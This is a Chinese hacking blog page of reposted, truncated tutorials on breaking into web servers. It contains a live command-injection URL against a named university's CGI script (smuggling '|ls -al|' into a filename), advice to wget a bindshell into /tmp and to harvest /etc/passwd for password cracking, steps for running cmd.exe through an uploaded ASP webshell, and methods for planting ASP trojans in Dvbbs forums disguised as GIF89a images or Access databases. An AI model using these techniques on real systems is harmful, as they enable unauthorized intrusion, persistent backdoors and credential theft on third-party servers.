鬼仔's Blog

来源:冰点极限论坛

名字 ice
密码 2008
http://lp.bhkj.cn/index.html
在没找到新的开发思路之前不再改进;
谁可以查杀请在回贴中说明:谢谢

来源:http://lams.blogchina.com/

我在zone-h得到了答案，他们是这样干的
用wget把bindshell下载到/tmp/目录下
或者再/etc/inetd.conf可写的情况下直接开一个交互的shell
然后用gcc编译
http://cgiserver.sogang.ac.kr/~gsviscom/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|ls%20-al|
ls -al显示文件

||中间的是显示的命令
很简单的办法是得到用户

最基本的办法是得到用户列表然后用流光跑密码

…. etc/passwd?

信息来源：黑白网络

有很多朋友问他得到了一个WEBSHELL,但是想用命令提示查看用户信息什么的,但是很多主机限制了执行命令,所以很多WEBSHELL就不能失去了很大的功能……前二天桂林老兵ASP站长助手6.0刚出来，我就以ASP站长助手6.0为例把它上传到一个禁止执行的虚拟主机，然后上传一个CMD.exe，然后调用你上传的CMD来执行命令……

本来想搞图文教程的，但感觉太简单，文字就可以说明清楚了

1.打开ASP站长助手6.0点击命令提示符，显示”没有权限”
2.用ASP站长助手6.0上传功能上传一个CMD.exe（在WIN\system32\cmd.exe）到你的WEBSHELL目录（其它目录也行，把上传以后的CMD.exe绝对路径COPY出来）
3.修改你的webshell找到调用CMD.exe的代码

Function CmdShell()
阅读全文 »

文章编辑:NetHacking 来源：http://www.powers.com.cn 作者:喜欢忧伤

背景：
(1)动网上传文件，备份得到后门
(2)使用GIF89a可以上传内容为木马的gif图片：逃过头像上传的检测。
所以产生了新的方法：上传gif头像图片，备份得到木马了。(使用范围为:动网7.1以前的版本)

但是很多人在执行后门后出现的是一张不能显示的图片．

偶还是公布一下我用了恩久的更方便的方法，同时解释一下为什么会出现这种情况．：
就是GIF89a加站长助手，运行后门的时候看到的就是站长助手的界面，唯一的不同就是左上角多了GIF89a几个字。这个方法在一看到背景（2）就用在一个论坛的测试上了。。呵呵

gif内容如下：
—–以下为gif图片内容(GIF89a下面是站长助手的内容,不用多看了)—-
GIF89a
<%
‘站长助手的内容…省略．．．
阅读全文 »

文章作者：喜欢忧伤
信息来源：邪恶八进制安全小组

背景：
dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了

解决办法：
我把asp木马插入到数据库里，然后恢复。这样肯定检查肯定可以通过的。

具体过程：
前提：
(偶以默认的安装情况为准，具体情况的把握靠自己了.)
你得到论坛dvbbs7.1后台。

1.偶已经作好一个数据库了：里面插入了加密的asp后门[就是那个写马的后门]
同时已经修改名字成dvbbsToshell.gif(文章最后有下载)了
＝＝＝补充下：关键是因为这个图片是access数据库才有用［详细解释见最后］===
阅读全文 »